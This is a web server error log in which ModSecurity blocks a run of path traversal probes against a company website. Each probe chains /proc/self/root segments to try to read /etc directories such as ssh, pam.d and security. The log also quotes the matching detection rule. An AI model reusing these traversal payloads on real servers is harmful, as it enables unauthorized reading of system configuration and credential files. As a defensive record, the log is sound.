[Wed Mar 18 09:25:55.767052 2026] [:error] [pid 19507:tid 140411624429312] [client 74.7.243.128:45636] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/raddb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqZ09Y0UrI5A3LftIyWGgAAAY4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 09:25:57.085966 2026] [:error] [pid 19507:tid 140411590858496] [client 74.7.243.128:45650] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/ssh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqZ1dY0UrI5A3LftIyWHgAAAZI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 09:25:58.444202 2026] [:error] [pid 15051:tid 140411540502272] [client 74.7.243.128:45656] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/gss"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqZ1imAPhZkrhU8w4lfJwAAAJg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 09:25:59.786802 2026] [:error] [pid 15826:tid 140411674785536] [client 74.7.243.128:37828] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/ipmi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqZ1-oXxyEfFpUF8f9gTAAAAUg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 09:26:07.230973 2026] [:error] [pid 17887:tid 140411548894976] [client 74.7.243.128:37838] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/avahi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqZ3wkwaGbbGflqUZACTAAAANc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 09:26:11.855780 2026] [:error] [pid 29882:tid 140411616036608] [client 74.7.243.128:37854] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/groff"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqZ40zinOy1jxa1j4cGigAAAQ8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 09:26:18.010550 2026] [:error] [pid 17887:tid 140411641214720] [client 74.7.243.128:44860] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/lwcorp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqZ6AkwaGbbGflqUZACUQAAAMw"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 09:26:35.595528 2026] [:error] [pid 26799:tid 140411733534464] [client 74.7.241.31:59416] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/cron.weekly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqZ-9a6ubjKNq_cu4aLOwAAA0E"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 09:26:49.961010 2026] [:error] [pid 31803:tid 140411658000128] [client 74.7.243.128:52242] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/pam.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqaCeyqAr6etmhZHNqxeAAAAEo"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 09:26:51.306963 2026] [:error] [pid 17887:tid 140411607643904] [client 74.7.243.128:51626] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/rwtab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqaCwkwaGbbGflqUZACYAAAANA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 09:26:52.587712 2026] [:error] [pid 26799:tid 140411716749056] [client 74.7.243.128:51628] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/php-fpm.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqaDNa6ubjKNq_cu4aLRgAAA0M"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 09:26:53.907031 2026] [:error] [pid 15826:tid 140411741927168] [client 74.7.243.128:51632] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqaDeoXxyEfFpUF8f9gdQAAAUA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 09:27:01.754604 2026] [:error] [pid 17653:tid 140411649607424] [client 74.7.243.128:51644] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/firewalld"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqaFcdf6f5d65gmYZTG0wAAAss"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 09:27:03.043237 2026] [:error] [pid 15051:tid 140411565680384] [client 74.7.243.128:52540] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/telegraf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqaFymAPhZkrhU8w4lfSAAAAJU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 09:27:04.251571 2026] [:error] [pid 31803:tid 140411741927168] [client 74.7.243.128:52546] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/terminfo"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqaGOyqAr6etmhZHNqxfQAAAEA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 09:27:06.709358 2026] [:error] [pid 26799:tid 140411725141760] [client 74.7.243.128:52562] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/plymouth"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqaGta6ubjKNq_cu4aLXAAAA0I"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 09:27:07.994807 2026] [:error] [pid 15826:tid 140411649607424] [client 74.7.243.128:52564] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/alternatives"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqaG-oXxyEfFpUF8f9geQAAAUs"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 09:27:09.945091 2026] [:error] [pid 17887:tid 140411641214720] [client 74.7.243.128:52570] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/security"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqaHQkwaGbbGflqUZACawAAAMw"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 09:27:15.875363 2026] [:error] [pid 15826:tid 140411683178240] [client 74.7.243.128:48242] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/portreserve"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqaI-oXxyEfFpUF8f9ggAAAAUc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 09:27:18.254258 2026] [:error] [pid 29882:tid 140411683178240] [client 74.7.243.128:48254] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/puppetlabs"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqaJkzinOy1jxa1j4cGtgAAAQc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 09:27:19.617329 2026] [:error] [pid 19507:tid 140411632822016] [client 74.7.243.128:48072] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/openldap"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqaJ9Y0UrI5A3LftIyWVgAAAY0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
